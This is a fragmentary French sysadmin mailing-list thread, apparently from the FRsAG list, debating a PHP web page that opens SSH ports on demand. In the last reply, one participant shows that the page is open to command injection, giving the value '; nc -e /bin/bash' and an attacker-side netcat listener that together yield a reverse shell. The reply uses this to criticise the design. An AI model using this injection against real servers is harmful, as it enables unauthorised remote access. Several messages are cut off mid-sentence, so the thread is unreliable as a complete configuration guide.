Il ne faut jamais laisser le port ssh directement sur le net sans
filtrage de la source ...
Mettre en place par exemple un "site" web d'ouverture du/des ports.
Par exemple un vhost :
https://remoteadm.mydomain.com/server1/
Mise en place :
Créer un vhost sur le serveur (beaucoup mieux : créer
C’est pas une critique mais ça veut dire que tu fais plus confiance à l’auth
HTTPS qu’à l’auth SSH ?
David
> Le 1 mai 2024 à 20:34, Ludovic LEVET via FRsAG a écrit :
>
> Il ne faut jamais laisser le port ssh directement sur le net sans filtrage de
> la source ...
>
> Mettre en place par exe
Heu ...
Déjà :
1) Si tu as pas le vhost + url complete, ben t'arriveras déjà a rien ...
2) l'auth https + 2fa , oui pas de brute force dessus si configuré
correctement (max retry 3, fail2ban ... )...
3) Bon ... (Mode Bigard On ..) En admettant que la chauves-souris elle
trouve le code de la
On Mon, Apr 29, 2024, 11:52 Louis G. wrote:
> Alors pas tout à fait. Changer le port te permettra juste de ne plus
> remonter dans les résultats Shodan des services écoutant sur le port 22. Tu
> apparaitra tout de même dans les résultats des recherches qui ciblent SSH
> (voir plus précisément sur
Hello,
au vu du morceau de php indiqué, il suffit d'envoyer le formulaire avec
:
; nc -e /bin/bash
du côté attaquant lancer :
$ nc -lvp
Et voilà un reverse shell simpliste qui contourne l'auth ssh.
--
Julien.
Le 01/05/2024 21:33, Ludovic LEVET via FRsAG a écrit :
Heu ...
Déjà